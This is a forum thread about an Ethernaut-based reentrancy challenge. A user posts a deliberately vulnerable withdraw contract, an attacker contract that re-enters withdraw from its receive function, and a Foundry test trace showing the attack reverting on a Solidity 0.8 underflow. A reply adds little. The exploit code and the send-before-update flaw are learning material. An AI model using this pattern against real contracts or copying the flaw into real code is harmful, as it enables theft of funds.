Help for reentrancy attack situation

[juliancabmar]

Hello everyone.
I have this contract to attack (based on Ethernaut n° 10 challenge):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Reentrance {
    mapping(address => uint256) public balances;

    function donate(address _to) public payable {
        balances[_to] += msg.value;
    }

    function balanceOf(address _who) public view returns (uint256 balance) {
        return balances[_who];
    }

    function withdraw(uint256 _amount) public {
        if (balances[msg.sender] >= _amount) {
            (bool result,) = msg.sender.call{value: _amount}("");
            if (result) {
                _amount;
            }
            balances[msg.sender] -= _amount;
        }
    }

    receive() external payable {}
}

This is my attacker contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IReentrance {
    function donate(address _to) external payable;

    function withdraw(uint256 _amount) external;
}

contract Attacker {
    IReentrance reentrance;
    address public owner;

    error Attacker_NotOwner(address);

    constructor(address _victim) payable {
        reentrance = IReentrance(_victim);
        owner = msg.sender;
    }

    function attack() external {
        if (msg.sender != owner) {
            revert Attacker_NotOwner(msg.sender);
        }
        reentrance.donate{value: 1 ether}(address(this));
        reentrance.withdraw(1 ether);
    }

    function withdraw() external {
        if (msg.sender != owner) {
            revert Attacker_NotOwner(msg.sender);
        }
        payable(msg.sender).call{value: address(this).balance}("");
    }

    receive() external payable {
        if (address(reentrance).balance > 1 ether) {
            reentrance.withdraw(1 ether);
        }
    }
}

And finally my (incomplete) foundry test:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {Test, console} from "forge-std/Test.sol";
import {Reentrance} from "../src/Victim.sol";
import {Attacker} from "../src/Attacker.sol";

contract VictimTest is Test {
    Reentrance ctrVictim;
    Attacker ctrAttacker;
    address public deployer;
    address public attacker;

    function setUp() public {
        deployer = makeAddr("owner");
        attacker = makeAddr("fox");
        vm.deal(attacker, 1 ether);
        vm.prank(address(deployer));
        ctrVictim = new Reentrance();
        vm.deal(address(ctrVictim), 10 ether);
    }

    function testReentrancy() public {
        vm.startPrank(attacker);
        ctrAttacker = new Attacker{value: 1 ether}(address(ctrVictim));
        console.log("ctrVictim initial balance: ", address(ctrVictim).balance);
        console.log("attaker initial balance: ", attacker.balance);

        ctrAttacker.attack();

        vm.stopPrank();
        console.log("ctrVictim final balance: ", address(ctrVictim).balance);
        console.log("attaker final balance: ", attacker);
    }
}

Seeing the console output of the test (with -vvvv), the reentrancy attack is not working because after the withdraw call loop finish, the balance state is updated give me a revert by underflow:

 [516657] VictimTest::testReentrancy()
    ├─ [0] VM::startPrank(fox: [0xFba5F8d9f4CBF58E50DAF1f15b30DB188491F700])
    │   └─ ← [Return] 
    ├─ [323173] → new Attacker@0x1b98a12135d77561Cec2Ef1f7433692A877B0732
    │   └─ ← [Return] 1391 bytes of code
    ├─ [0] console::log("ctrVictim initial balance: ", 10000000000000000000 [1e19]) [staticcall]
    │   └─ ← [Stop] 
    ├─ [0] console::log("attaker initial balance: ", 0) [staticcall]
    │   └─ ← [Stop] 
    ├─ [123164] Attacker::attack()
    │   ├─ [22800] Reentrance::donate{value: 1000000000000000000}(Attacker: [0x1b98a12135d77561Cec2Ef1f7433692A877B0732])
    │   │   └─ ← [Stop] 
    │   ├─ [91913] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   ├─ [83810] Attacker::receive{value: 1000000000000000000}()
    │   │   │   ├─ [82740] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   ├─ [74441] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   ├─ [73362] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   ├─ [65259] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   ├─ [64189] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   ├─ [55890] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   ├─ [54811] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   ├─ [46708] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   ├─ [45638] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [37339] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [36260] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [28157] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [27087] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [18788] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [17709] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [9606] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [8536] Reentrance::withdraw(1000000000000000000 [1e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [321] Attacker::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   │   │   │   └─ ← [Stop] 
    │   │   │   └─ ← [Stop] 
    │   │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    │   └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
    └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)

Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.78ms (765.07µs CPU time)

Ran 1 test suite in 842.96ms (1.78ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)

Failing tests:
Encountered 1 failing test in test/Victim.t.sol:VictimTest
[FAIL: panic: arithmetic underflow or overflow (0x11)] testReentrancy() (gas: 516657)

So, my question is: is there any way to bypass the balance update?... I know that the original ethernaut challenge exploit the solidity 0.6.x arithmetic vulnerability... but, I had to try.

Thanks for advance :)

[EngrPips]

I don't see a way out with solidity version 0.8+ but maybe I don't know enough yet.